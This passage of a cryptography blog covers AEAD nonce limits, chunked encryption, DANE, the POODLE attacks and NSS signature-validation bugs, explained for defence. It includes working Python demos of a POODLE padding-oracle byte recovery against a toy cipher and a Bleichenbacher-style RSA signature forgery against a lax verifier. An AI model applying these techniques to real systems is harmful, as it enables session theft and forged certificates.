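    return 2 * log2_messages - 1 - nonce_bits


def max_log2_messages(nonce_bits: int, log2_risk: int = -33) -> int:
    """Largest log2(message count) that keeps the collision chance at or
    below 2**log2_risk under the same approximation."""
    return (nonce_bits + 1 + log2_risk) // 2


gcm_risk = log2_collision_probability(32, 96)       # 2^32 messages, 96-bit nonce
xsalsa_risk = log2_collision_probability(32, 192)   # same count, 192-bit nonce
xsalsa_limit = max_log2_messages(192)               # messages allowed at 2^-33
```

For a 96-bit nonce and 2^32 messages this gives 2^-33, matching the limit above. With a 192-bit nonce the same number of messages gives 2^-129, and the 2^-33 line isn't reached until about 2^80 messages.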

Another approach would be to use an AEAD that doesn't fail quite so catastrophically when an nonce is repeated. This is called an nonce-misuse resistant AEAD and we're hitting the boundary of developed practice now. The CAESAR competition has several nonce-misuse resistant entries in it, although it's not scheduled to conclude until 2018. Closer to established primitives, Gueron and Lindell propose an AES-GCM-SIV mode with a strong foundation (assuming that you trust AES-GCM) and good performance (assuming that you have good AES-GCM performance).

AEADs with large plaintexts

If you look at AEAD APIs you'll generally notice that they take the entire plaintext or ciphertext at once. In other words, they aren't “streaming” APIs. This is not a mistake, rather it's the streaming APIs that are generally a mistake.

I've complained about this in the past, so I'll be brief here. In short, old standards (e.g. PGP) will encrypt plaintexts of any length and then put an authenticator at the end. The likely outcome of such a design is that some implementations will stream out unauthenticated plaintext and only notice any problem when they get to the end of the ciphertext and try to check the authenticator. But by that time the damage has been done—it doesn't take much searching to find people suggesting piping the output of gpg to tar or even a shell.

So, if streaming is required, large plaintexts should be chunked and each chunk should easily fit into a “one-shot” API like those linked to above. That prevents unauthenticated plaintext from being processed. However, there is no standard for this; it's another case where we've hit the borders of existing practice. Implementations need to construct the nonces and associated data so that the first chunk is known to be the first, so that each chunk is in order and so that truncation is always detectable.
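Since there's no standard, the following is just one possible sketch of those three properties, not a recommendation. It assumes a fresh key for every stream, puts the chunk index in the nonce (which fixes the first chunk and the order) and puts a “last chunk” flag in the associated data (which makes truncation detectable). The toy AEAD underneath is an HMAC-based stand-in so that the example is self-contained; it is not a real AEAD, and all of the names are hypothetical.

```python
import hashlib
import hmac

TAG_LEN = 32


def _prf(key: bytes, label: bytes, data: bytes) -> bytes:
    return hmac.new(key, label + data, hashlib.sha256).digest()


def _stream(key: bytes, nonce: bytes, length: int) -> bytes:
    blocks = length // 32 + 1
    return b"".join(_prf(key, b"enc", nonce + i.to_bytes(4, "big")) for i in range(blocks))[:length]


def toy_seal(key: bytes, nonce: bytes, ad: bytes, plaintext: bytes) -> bytes:
    # Toy AEAD stand-in. nonce (12 bytes) and ad (1 byte) are fixed-size here,
    # so concatenating them into the MAC input is unambiguous.
    body = bytes(p ^ s for p, s in zip(plaintext, _stream(key, nonce, len(plaintext))))
    return body + _prf(key, b"mac", nonce + ad + body)


def toy_open(key: bytes, nonce: bytes, ad: bytes, ciphertext: bytes) -> bytes:
    if len(ciphertext) < TAG_LEN:
        raise ValueError("decryption failed")
    body, tag = ciphertext[:-TAG_LEN], ciphertext[-TAG_LEN:]
    if not hmac.compare_digest(tag, _prf(key, b"mac", nonce + ad + body)):
        raise ValueError("decryption failed")
    return bytes(c ^ s for c, s in zip(body, _stream(key, nonce, len(body))))


def _nonce(index: int) -> bytes:
    return index.to_bytes(12, "big")  # chunk position; key must be per-stream


def _ad(is_last: bool) -> bytes:
    return b"\x01" if is_last else b"\x00"


def seal_chunks(key: bytes, data: bytes, chunk_size: int) -> list:
    # An empty input still produces one (empty) final chunk.
    pieces = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)] or [b""]
    last = len(pieces) - 1
    return [toy_seal(key, _nonce(i), _ad(i == last), p) for i, p in enumerate(pieces)]


def open_chunks(key: bytes, chunks: list) -> bytes:
    if not chunks:
        raise ValueError("truncated stream")
    last = len(chunks) - 1
    # Each chunk is authenticated, with its position and last-flag, before use.
    return b"".join(toy_open(key, _nonce(i), _ad(i == last), c) for i, c in enumerate(chunks))


stream_key = b"\x07" * 32  # assumed to be freshly generated for this one stream
chunks = seal_chunks(stream_key, b"abcdefghij", 4)
```

Dropping the final chunk makes the new final chunk fail to open, because it was sealed with the flag clear. A real streaming receiver would release each earlier chunk as soon as it authenticates and only apply the last-chunk check at end of input; open_chunks collects everything just to keep the sketch short.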

Streaming decryption always runs the risk of an attacker truncating the ciphertext however. Designs must always be able to detect truncation, but it's very easy to imagine that the rest of a system doesn't handle it well. (For example, see the Cookie Cutter attack against HTTPS.)

If streaming isn't essential then an all-or-nothing transform would be ideal. But, again, there are no substantial standards or practice around this. Hopefully in ten years or so there will be clear answers for this and for large-plaintext constructions with AEADs (AERO is a start). But, for now, even symmetric encryption isn't a “solved problem”.

Why not DANE in browsers

Thomas Ptacek laid out a number of arguments against DNSSEC recently (and in a follow up). We don't fully agree on everything, but it did prompt me to write why, even if you assume DNSSEC, DANE (the standard for speaking about the intersection of TLS and DNSSEC) is not a foregone conclusion in web browsers.

There are two ways that you might wish to use DANE in a web browser: either to block a certificate that would normally be considered valid, or to bless a certificate that would normally be rejected. The first, obviously, requires that DANE information always be obtained—if a lookup failure was ignored, a network attacker with a bad certificate would just simulate a lookup failure. But requiring that browsers always obtain DANE information (or a proof of absence) is nearly implausible:

Some years ago now, Chrome did an experiment where we would look up a TXT record that we knew existed when we knew the Internet connection was working. At the time, some 4–5% of users couldn't look up that record; we assume because the network wasn't transparent to non-standard DNS resource types. DANE records are going to be even more non-standard, are going to be larger and browsers would have to fetch lots of them because they'll need the DNSKEY/RRSIG chain up from the root. Even if DNSSEC record lookup worked flawlessly for everyone, we probably still wouldn't implement this aspect of DANE because each extra lookup is more latency and another chance for packet loss to cause an expensive timeout and retransmit.

Instead, for this we have HPKP, which is a memory-based pinning solution using HTTP headers. We also have pre-loaded pinning in Chrome for larger or more obvious targets. Thomas Ptacek seems bullish on pinning but I'm much more lukewarm. HPKP is quite complex and no doubt someone will write a “supercookies” story about it at some point, as they have for HSTS. Additionally, pinning is quite dangerous. Clients deciding that “pinning is good” have caused headaches at Google. It's also worth noting that CryptoCat has committed pinning-suicide in Chrome at at the moment due to their CA having switched intermediates between renewals. They're waiting for the release of Chrome 41 to recover.

But what about the other side of DANE: blessing certificates that would otherwise be considered untrusted? In this case, DNSSEC can be seen as something like another CA. The same problems with looking up DNSSEC records apply, but are much less painful when you only need to depend on the lookup for sites that are using DANE certificates. Indeed, Chrome even supported something very like DANE for a while. In that case the DNSSEC records were contained in the certificate to avoid the latency and complexity of looking them up in the client. (DNSSEC records contain signatures so need not be transported over the DNS protocol.)

But support for that was removed because it was a bunch of parsing code outside of the sandbox, wasn't really being used and it conflicted with two long-term plans for the health of the HTTPS ecosystem: eliminating 1024-bit RSA and Certificate Transparency. The conflicts are probably the most important reasons for not wanting to renew the experiment.

The effort to remove 1024-bit RSA from HTTPS has been going for years and is, perhaps, nearing completion now. (That noise that you can hear is my colleague, Ryan Sleevi, crying softly.) There are still some 1024-bit root certificates, but they are nearly gone from the Mozilla set. The amount of work involved is an order of magnitude greater than you expect because of the interactions of different X.509 validation libraries, intermediate chains and varying root stores on different platforms and versions.

DNSSEC, however, is littered with 1024-bit RSA. You literally can't avoid it because the root zone transits through a 1024-bit key. DNSSEC has them because of (I think) concerns about the size of responses and they are usually rotated every two or three months. The RFC suggests that 1024-bit RSA is good for “most zones” until 2022. Dan Bernstein's paper on Batch NFS deals well with the question of whether that's wise.

Next, Certificate Transparency is our effort to add strong, technical audits to the CA system by creating a trustworthy log of all valid certificates. CT logs only accept certificates from CAs as an anti-spam measure but people can create DANE certificates for domains at will. This is far from an insurmountable problem, but it is a problem that would need to be solved and the CT team already have their hands full with the staged rollout of CT in Chrome.

The 1024-bit RSA problem isn't insurmountable either (although it's baked in much deeper), so it's possible that browsers might accept a DNSSEC signature chain in a certificate in the future, but it's a long way out.

The POODLE bites again

October's POODLE attack affected CBC-mode cipher suites in SSLv3 due to SSLv3's under-specification of the contents of the CBC padding bytes. Since SSLv3 didn't say what the padding bytes should be, implementations couldn't check them and that opened SSLv3 up to an oracle attack.

We've done pretty well at killing off SSLv3 in response to that. Chrome 39 (released Nov 18th) removed fallback to SSLv3 and Chrome 40 is scheduled to remove SSLv3 completely. Firefox 34 (released Dec 1st) has already removed SSLv3 support.

We're removing SSLv3 in favour of TLS because TLS fully specifies the contents of the padding bytes and thus stops the attack. However, TLS's padding is a subset of SSLv3's padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn't check the padding bytes but that wouldn't cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections.
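To make the difference concrete, here is a minimal Python sketch of the two padding checks. The function names are made up for illustration and neither is taken from a real TLS stack. Real code also has to do this in constant time, which this sketch does not attempt.

```python
def sslv3_padding_ok(record: bytes, block_size: int) -> bool:
    """SSLv3-style check: only the final length byte can be inspected."""
    if not record or len(record) % block_size != 0:
        return False
    pad_len = record[-1]
    # The padding bytes themselves are unspecified, so there is nothing
    # more to verify than the length being plausible.
    return pad_len < block_size and pad_len + 1 <= len(record)


def tls_padding_ok(record: bytes, block_size: int) -> bool:
    """TLS-style check: every padding byte must equal the length byte."""
    if not record or len(record) % block_size != 0:
        return False
    pad_len = record[-1]
    if pad_len + 1 > len(record):
        return False
    return all(b == pad_len for b in record[-(pad_len + 1):])
```

A decrypted record that ends in arbitrary bytes followed by a plausible length byte passes the first check and fails the second. A TLS implementation that uses the first function by mistake inherits the SSLv3 weakness.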

This was noted by, at least, Brian Smith on the TLS list ([1][2]) and I was sufficiently cynical to assume that there were probably more instances of this than the old versions of NSS that Brian cited, and so wrote a scanner for the issue.

Unfortunately, I found a number of major sites that had this problem. At one of them, at least, I had good enough contacts to quickly find that they used an F5 device to terminate connections. I contacted F5 on October 21st and they started working on a fix. Yngve Pettersen also independently found this issue and contacted me about it around this time.

F5 reported that some of the affected sites weren't customers of theirs, which meant that there was (at least) a second vendor with the same issue. After more digging, I found that some A10 devices also have this problem. I emailed a number of contacts at A10 on October 30th but sadly didn't get a reply from any of them. It wasn't until November 13th that I found the right person at A10 to deal with this.

F5 and A10 have posted patches for their products (F5's are here and A10's are here and they have an advisory here). I'm not completely sure that I've found every affected vendor but, now that this issue is public, any other affected products should quickly come to light. (Citrix devices have an odd behaviour in this area in that they'll accept padding bytes that are all zeros, but not random padding. That's unexpected but I can't make an attack out of it.)

(Update: since posting this, it appears that products from Fortinet, Cisco, IBM (WebSphere, Domino, Tivoli) and Juniper may also be affected.)

Ivan Ristić has added a test for this issue to his excellent scanner at SSLLabs. Affected sites will have their grade set to F and will report “This server is vulnerable to the POODLE attack against TLS servers”.

This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad. While RC4 is fundamentally broken and no implementation can save it, attacks against MtE-CBC ciphers have repeatedly been shown to be far more practical. Thankfully, TLS 1.2 support is about to hit 50% at the time of writing.

POODLE attacks on SSLv3

My colleague, Bodo Möller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn't require such extensive control of the format of the plaintext and thus is more practical.

Fundamentally, the design flaw in SSL/TLS that allows this is the same as with Lucky13 and Vaudenay's two attacks: SSL got encryption and authentication the wrong way around – it authenticates before encrypting.

Consider the following plaintext HTTP request, which I've broken into 8-byte blocks (as in 3DES), but the same idea works for 16-byte blocks (as in AES) just as well:

[Figure: the HTTP request laid out in 8-byte blocks, followed by the MAC and a final block of padding.]

The last block contains seven bytes of padding (represented as •) and the final byte is the length of the padding. (And I've used a fictional, 8-byte MAC, but that doesn't matter.) Before transmission, those blocks would be encrypted with 3DES or AES in CBC mode to provide confidentiality.

Now consider how CBC decryption works at the receiver, thanks to this public domain diagram from Wikipedia:

[Figure: CBC mode decryption. Each ciphertext block goes through the block cipher decryption under the key, and the result is XORed with the previous ciphertext block (the Initialization Vector (IV) for the first block) to give the plaintext.]

An attacker can't see the plaintext contents like we can in the diagram, above. They only see the CBC-encrypted ciphertext blocks. But what happens if the attacker duplicates the block containing the cookie data and overwrites the last block with it? When the receiver decrypts the last block it XORs in the contents of the previous ciphertext (which the attacker knows) and checks the authenticity of the data. Critically, since SSLv3 doesn't specify the contents of the padding (•) bytes, the receiver cannot check them. Thus the record will be accepted if, and only if, the last byte ends up as a seven.

An attacker can run Javascript in any origin in a browser and cause the browser to make requests (with cookies) to any other origin. If the attacker does this block duplication trick they have a 1-in-256 chance that the receiver won't reject the record and close the connection. If the receiver accepts the record then the attacker knows that the decryption of the cookie block that they duplicated, XORed with the ciphertext of the previous block, equals seven. Thus they've found the last byte of the cookie using (on average) 256 requests.
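The block duplication trick can be simulated end to end. The following is only a sketch under loud assumptions: the block cipher is a toy 4-round Feistel construction invented for this example (not 3DES or AES), the MAC is a truncated HMAC, the record layout is simplified, and the message is chosen to be a multiple of the block size so that the final block is entirely padding. All function names are hypothetical.

```python
import hashlib
import hmac
import os

BLOCK = 8  # toy 8-byte blocks, as with 3DES


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def f(key: bytes, i: int, half: bytes) -> bytes:
    # Round function for a toy Feistel cipher. NOT a real cipher.
    return hashlib.sha256(key + bytes([i]) + half).digest()[:4]


def encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for i in range(4):
        left, right = right, xor(left, f(key, i, right))
    return left + right


def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for i in reversed(range(4)):
        left, right = xor(right, f(key, i, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> list:
    blocks, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        blocks.append(prev)
    return blocks


def cbc_decrypt(key: bytes, iv: bytes, blocks: list) -> bytes:
    out, prev = b"", iv
    for block in blocks:
        out += xor(decrypt_block(key, block), prev)
        prev = block
    return out


def seal(enc_key, mac_key, iv, message):
    # MAC-then-encrypt with SSLv3-style padding: random bytes, then a length.
    mac = hmac.new(mac_key, message, hashlib.sha256).digest()[:BLOCK]
    body = message + mac
    pad_len = BLOCK - 1 - len(body) % BLOCK
    return cbc_encrypt(enc_key, iv, body + os.urandom(pad_len) + bytes([pad_len]))


def server_accepts(enc_key, mac_key, iv, blocks):
    plain = cbc_decrypt(enc_key, iv, blocks)
    pad_len = plain[-1]  # the only padding byte that SSLv3 lets us check
    if pad_len >= BLOCK or pad_len + 1 + BLOCK > len(plain):
        return False
    body = plain[:-(pad_len + 1)]
    message, mac = body[:-BLOCK], body[-BLOCK:]
    expected = hmac.new(mac_key, message, hashlib.sha256).digest()[:BLOCK]
    return hmac.compare_digest(mac, expected)


def recover_last_byte(message: bytes, target: int):
    """Recover the final byte of plaintext block `target` (target >= 1)."""
    requests = 0
    while True:
        requests += 1
        # Every request is a new connection, so new keys and a new IV.
        enc_key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(BLOCK)
        blocks = seal(enc_key, mac_key, iv, message)
        # The attacker overwrites the all-padding final block with the target.
        forged = blocks[:-1] + [blocks[target]]
        if server_accepts(enc_key, mac_key, iv, forged):
            # Accepted, so D(target)[7] ^ blocks[-2][7] == 7, and CBC says
            # D(target)[7] == plaintext[7] ^ blocks[target - 1][7].
            return (BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target - 1][-1], requests
```

Calling `recover_last_byte(b"Cookie: secret42", 1)` returns the byte value of the final `2` along with the number of requests that it took, which should be somewhere around 256. Note that the attacker's arithmetic only uses ciphertext bytes; the keys appear in the function solely to play the parts of the browser and the server.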

Now the attacker can increase the length of the requested URL and decrease the length of something after the cookies and make the request look like this:

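[Figure: the same request with a longer URL, so that the cookie data is shifted by one byte relative to the block boundaries.]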

Note that the Cookie data has been shifted so that the second to last byte of the data is now at the end of the block. So, with another 256 requests the attacker can expect to have decrypted that byte and so on.

Thus, with an average of 256×n requests and a little control of the layout of those requests, an attacker can decrypt n bytes of plaintext from SSLv3. The critical part of this attack is that SSLv3 doesn't specify the contents of padding bytes (the •s). TLS does and so this attack doesn't work because the attacker only has a 2⁻⁶⁴ or 2⁻¹²⁸ chance of a duplicated block being a valid padding block.

This should be an academic curiosity because SSLv3 was deprecated very nearly 15 years ago. However, the Internet is vast and full of bugs. The vastness means that a non-trivial number of SSLv3 servers still exist and workarounds for the bugs mean that an attacker can convince a browser to use SSLv3 even when both the browser and server support a more recent version. Thus, this attack is widely applicable.

SSL/TLS has a perfectly good version negotiation mechanism that should prevent a browser and server that support a modern TLS version from using anything less. However, because some servers are buggy and don't implement version negotiation correctly, browsers break this mechanism by retrying connections with lesser SSL/TLS versions when TLS handshaking fails. These days we're more aware of the fact that fallback behaviour like this is a landmine for the future (as demonstrated today) but this TLS fallback behaviour was enshrined long ago and we're stuck with it. It means that, by injecting some trivial errors on the network, an attacker can cause a browser to speak SSLv3 to any server and then run the above attack.

What's to be done?

It's no revelation that this fallback behaviour is bad news. In fact, Bodo and I have a draft out for a mechanism to add a second, less bug-rusted mechanism to prevent it called TLS_FALLBACK_SCSV. Chrome and Google have implemented it since February this year and so connections from Chrome to Google are already protected. We are urging server operators and other browsers to implement it too. It doesn't just protect against this specific attack, it solves the fallback problem in general. For example, it stops attackers from downgrading TLS 1.2 to 1.1 and 1.0 and thus removing modern, AEAD ciphers from a connection. (Remember, everything less than TLS 1.2 with an AEAD mode is cryptographically broken.) There should soon be an updated OpenSSL version that supports it.
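The server side of the check is small. Here is a sketch in Python, assuming the values that the draft uses for the signalling cipher suite (0x5600) and for the new alert (86). The function name and the way the ClientHello is represented are made up for illustration.

```python
TLS_FALLBACK_SCSV = 0x5600        # signalling cipher suite value (assumed from the draft)
INAPPROPRIATE_FALLBACK = 86       # alert number (assumed from the draft)

SSL3, TLS10, TLS11, TLS12 = 0x0300, 0x0301, 0x0302, 0x0303


def server_check_fallback(client_version, client_cipher_suites, server_max_version):
    """Return an alert number if the handshake must be aborted, else None."""
    # A client only sends the SCSV when it is retrying with a lower version.
    # If the server could have done better, something on the path forced
    # the downgrade and the connection should fail.
    if TLS_FALLBACK_SCSV in client_cipher_suites and client_version < server_max_version:
        return INAPPROPRIATE_FALLBACK
    return None
```

A client that has fallen back to SSLv3 and so includes the SCSV gets the alert from a TLS 1.2 server, while a first-attempt TLS 1.2 handshake, or an old client that genuinely only speaks SSLv3 and never sends the SCSV, proceeds as before.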

Even with TLS_FALLBACK_SCSV, there will be a long tail of servers that don't update. Because of that, I've just landed a patch on Chrome trunk that disables fallback to SSLv3 for all servers. This change will break things and so we don't feel that we can jump it straight to Chrome's stable channel. But we do hope to get it there within weeks and so buggy servers that currently function only because of SSLv3 fallback will need to be updated.

Chrome users that just want to get rid of SSLv3 can use the command line flag --ssl-version-min=tls1 to do so. (We used to have an entry in the preferences for that but people thought that “SSL 3.0” was a higher version than “TLS 1.0” and would mistakenly disable the latter.)

In Firefox you can go into about:config and set security.tls.version.min to 1. I expect that other browser vendors will publish similar instructions over the coming days.

As a server operator, it is possible to stop this attack by disabling SSLv3, or by disabling CBC-mode ciphers in SSLv3. However, the compatibility impact of this is unclear. Certainly, disabling SSLv3 completely is likely to break IE6. Some sites will be happy doing that, some will not.

A little further down the line, perhaps in about three months, we hope to disable SSLv3 completely. The changes that I've just landed in Chrome only disable fallback to SSLv3 – a server that correctly negotiates SSLv3 can still use it. Disabling SSLv3 completely will break even more than just disabling the fallback but SSLv3 is now completely broken with CBC-mode ciphers and the only other option is RC4, which is hardly that attractive. Any servers depending on SSLv3 are thus on notice that they need to address that now.

We hardened SSLv3 and TLS 1.0 against the BEAST attack with 1/n-1 record splitting and, based on an idea by Håvard Molland, it is possible to do something called anti-POODLE record splitting this time. I'll omit the details, but one can ensure that the last block in a CBC record contains at least six fixed bytes using only one split for AES and two for 3DES. With this, CBC is probably less bad than RC4. However, while anti-POODLE record splitting should be easy to deploy because it's valid according to the spec, so was 1/n-1 and deploying that was very painful. Thus there's a high risk that this would also cause compatibility problems. Therefore I'm not proceeding with anti-POODLE record splitting and concentrating on removing SSLv3 fallback instead. (There's also the possibility that an attacker could run the attack on the server to client direction. If we assume that both the client and the server get patched then we might as well assume that they are patched for TLS_FALLBACK_SCSV, which makes record splitting moot.)

PKCS#1 signature validation

On Wednesday, Chrome and Mozilla did coordinated updates to fix an RSA signature verification bug in NSS — the crypto library that handles SSL in Firefox and (currently) Chrome on most platforms. The updates should be well spread now and the bug has been detailed on Reddit, so I think it's safe to talk about.

(Hilariously, on the same day, bash turned out to have a little security issue and so hardly anyone noticed the NSS one!)

The NSS bug is another variant of Bleichenbacher's 2006 attack on RSA signature validation. To recap: an RSA signature is roughly the cube root of the message hash modulo the RSA modulus. Verification involves cubing the signature and checking that the result is the hash that you expected. Cubing modulo an RSA modulus is easy but finding a cube root is infeasible.
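As a toy illustration of that asymmetry, here is textbook RSA with a public exponent of three in Python. The primes are absurdly small and there is no padding at all, so this is only a sketch of the arithmetic. It needs Python 3.8 or later for the modular inverse via `pow`.

```python
p, q, e = 11, 17, 3                  # toy primes; real keys are thousands of bits
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent: the cube-root trapdoor


def sign(message_hash: int) -> int:
    # Taking a cube root modulo n needs d, which needs the factors of n.
    return pow(message_hash, d, n)


def verify(message_hash: int, signature: int) -> bool:
    # Cubing modulo n needs only the public values.
    return pow(signature, e, n) == message_hash
```

Here `verify(42, sign(42))` holds, while the same signature does not verify for any other hash value below n.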

There's a little more to it because one needs to eliminate some properties of the RSA operation by formatting the hash that you're going to sign — called padding.

The standard for RSA signing and encryption is PKCS#1 version 1.5. The PKCS series of standards are amazing. Although I've no doubt that the people writing them were doing their best, it was a long time ago and mistakes were made. In a modern light, they are all completely terrible. If you wanted something that was plausible enough to be widely implemented but complex enough to ensure that cryptography would forever be hamstrung by implementation bugs, you would be hard pressed to do better. If you can find some implementers, just say "PKCS#11!" or "PKCS#12!" as punchlines. You'll get a good laugh, although possibly also a few panic attacks.

(PKCS#1 version 2 is much better, but only because they took it from Bellare and Rogaway and slapped the PKCS#1 title on it.)

PKCS#1 version 1.5 wanted to include an identifier for the hash function that's being used, inside the signature. This is a fine idea, but they did it by encoding the algorithm and hash value with ASN.1. This caused many implementations to include the complexity of an ASN.1 parser inside signature validation and that let the bugs in.

Bleichenbacher's original attack was based on the observation that the ASN.1 parsers, in many cases, didn't reject extra trailing data. This is reasonable behaviour for a generic ASN.1 parser, but a disaster in signature verification. Because the parser could ignore so much of the signature, Bleichenbacher could arrange for a perfect cube to have a suitable prefix and thus calculate the cube root over the integers — ignoring the RSA modulus completely!
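The forgery is short enough to sketch in Python. Everything here is an assumption made for illustration: the key size (3072 bits with a public exponent of three), the use of SHA-256, the stand-in modulus, and the `lax_verify` function, which models a verifier that stops looking after the hash rather than reproducing any particular library.

```python
import hashlib

# DER prefix of a SHA-256 DigestInfo (AlgorithmIdentifier with NULL parameter).
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")
KEY_BITS = 3072
# Stand-in modulus: any 3072-bit value behaves the same here, because the
# forged signature cubed never reaches the modulus. This is not a real key.
N = (1 << KEY_BITS) - 1


def ceil_cube_root(x: int) -> int:
    """Smallest integer r with r**3 >= x, found by binary search."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def encoded_message(signature: int) -> bytes:
    return pow(signature, 3, N).to_bytes(KEY_BITS // 8, "big")


def lax_verify(signature: int, digest: bytes) -> bool:
    em = encoded_message(signature)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:
        return False
    expected = SHA256_PREFIX + digest
    # The bug: nothing checks that the hash is the last thing in the block.
    return em[i + 1:i + 1 + len(expected)] == expected


def strict_verify(signature: int, digest: bytes) -> bool:
    expected = SHA256_PREFIX + digest
    padding = b"\xff" * (KEY_BITS // 8 - 3 - len(expected))
    return encoded_message(signature) == b"\x00\x01" + padding + b"\x00" + expected


def forge(digest: bytes) -> int:
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_PREFIX + digest
    zeros = b"\x00" * (KEY_BITS // 8 - len(prefix))
    # Round up to the next perfect cube; the error lands in the ignored tail.
    return ceil_cube_root(int.from_bytes(prefix + zeros, "big"))
```

For any digest, `forge` produces a value that `lax_verify` accepts and `strict_verify` rejects, without ever touching a private key. The gap between the target and the next perfect cube is roughly two thirds of the width of the number, which is far smaller than the trailing space that the lax verifier ignores.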

That was fixed, but there was another common bug: the ASN.1 structure used to identify the hash was a standard structure called AlgorithmIdentifier, which includes an optional parameter. Implementations were ignoring the parameter and that also introduced a vulnerability: arbitrary bytes could be inserted as a parameter and that was sufficient to forge signatures. (See section five of this paper for details.)

This week's vulnerability was similar. Antoine Delignat-Lavaud (who, by the way, has been doing stellar work along with the Prosecco team at INRIA: see Triple Handshake, Cookie Cutter, SPDY and virtual host attacks and miTLS) noticed that the check on the contents of the parameters in NSS wasn't very strict: it was only checking that the length was at most two bytes. This is because, due to complexity, there wasn't universal agreement on what the parameter should be. The ASN.1 for the parameter is an ANY type (with the concrete type depending on a preceding object id) but also optional. So, when not needed, should it be an ASN.1 NULL (which is two bytes long), or should it be omitted completely? The answer is the former, but it was underspecified for a long time.

Once Antoine had put a spotlight on the code, Brian Smith noticed something worse: an integer overflow in the ASN.1 parser. ASN.1 (in DER form at least, because, of course, ASN.1 has multiple defined encodings) has variable-length lengths, and NSS was using a generic ASN.1 parser which didn't check for overflow. So you could specify that a length was arbitrarily long and the parser would do something similar to:

unsigned length = 0;
for (i = 0; i < length_of_length; i++) {
  /* No overflow check: earlier bytes are shifted out of the top. */
  length <<= 8;
  length |= length_bytes[i];
}

Thus, as long as the last 4 or 8 bytes (depending on whether the system was 32 or 64 bit) encoded the correct length, the bytes before that would be ignored. That allows arbitrary bytes in the signature again and the attack from section 5 of the previous paper can still be used to make forged signatures.
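The wraparound is easy to reproduce. The sketch below models it in Python, using a mask to stand in for a fixed-width C unsigned integer, alongside a stricter parser that refuses lengths which don't fit or which aren't minimally encoded. It only covers the length bytes of a long-form length and the function names are hypothetical.

```python
def parse_length_unchecked(length_bytes: bytes, word_bits: int = 32) -> int:
    mask = (1 << word_bits) - 1
    length = 0
    for b in length_bytes:
        length = ((length << 8) | b) & mask  # mimics C unsigned wraparound
    return length


def parse_length_checked(length_bytes: bytes, word_bits: int = 32) -> int:
    # A leading zero byte means the length was not minimally encoded.
    if not length_bytes or length_bytes[0] == 0:
        raise ValueError("non-minimal length encoding")
    if len(length_bytes) * 8 > word_bits:
        raise ValueError("length overflows the machine word")
    return int.from_bytes(length_bytes, "big")
```

Ten bytes of junk followed by a four-byte encoding of 32 parses as 32 with the first function, which is precisely the room for arbitrary bytes that the attacker wants. The second function raises `ValueError` for the same input.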

(Intel's ATR group also reported the same issue to Mozilla a little bit later. Bugs often seem to work like scientific discovery.)

The moral of the story

The moral here is that an ASN.1 parser should never have been put somewhere so sensitive; parsing is dangerous. It was a mistake to have defined PKCS#1 that way, but it can be ameliorated: rather than parsing, generate the expected signature contents and compare it against the plaintext. Go has always done this. I believe that SSH does this. Bouncy Castle reportedly does this. BoringSSL does this because I changed it from OpenSSL (prior to learning about the NSS issue — it's just a good idea). NSS does it now, although they're still worried about the omitted parameter vs NULL parameter confusion so they serialise two ASN.1 outputs and compare against both.
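Here is a sketch of the generate-and-compare approach in Python. It is not the code from Go, BoringSSL or NSS. The key is a toy built from two Mersenne primes purely so that the example needs no key generation, and SHA-256 is assumed as the hash. It needs Python 3.8 or later for the modular inverse via `pow`.

```python
import hashlib
import hmac

# Toy key from two Mersenne primes. Never use a key like this for real.
P, Q, E = 2**521 - 1, 2**607 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8  # modulus length in bytes

# DER prefixes for a SHA-256 DigestInfo, with and without the NULL parameter.
SHA256_WITH_NULL = bytes.fromhex("3031300d060960864801650304020105000420")
SHA256_NO_NULL = bytes.fromhex("302f300b06096086480165030402010420")


def expected_block(message: bytes, prefix: bytes = SHA256_WITH_NULL) -> bytes:
    digest_info = prefix + hashlib.sha256(message).digest()
    padding = b"\xff" * (K - 3 - len(digest_info))
    return b"\x00\x01" + padding + b"\x00" + digest_info


def sign(message: bytes, prefix: bytes = SHA256_WITH_NULL) -> int:
    return pow(int.from_bytes(expected_block(message, prefix), "big"), D, N)


def verify(message: bytes, signature: int) -> bool:
    if not 0 <= signature < N:
        return False
    recovered = pow(signature, E, N).to_bytes(K, "big")
    # No parsing at all: build the one acceptable encoding and compare.
    return hmac.compare_digest(recovered, expected_block(message))
```

With this shape there is no parser to get wrong: a signature made over the encoding that omits the NULL parameter simply fails to match. A verifier that wanted to tolerate the omitted parameter, as described above for NSS, would compare against a second expected block built with `SHA256_NO_NULL`.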

I generated a number of tests of different possible points of flexibility in signature parsing so that other libraries can be tested. For example, you can test OpenSSL (which still uses an ASN.1 parser) against them like this:

for cert in *.crt; do
  # Skip the root itself; it is the trust anchor, not a test case.
  [ "$cert" = root2048.crt ] && continue
  if openssl verify -CAfile root2048.crt "$cert" 2>/dev/null | grep -q "$cert: OK"; then
    echo "$cert accepted"
  fi
done

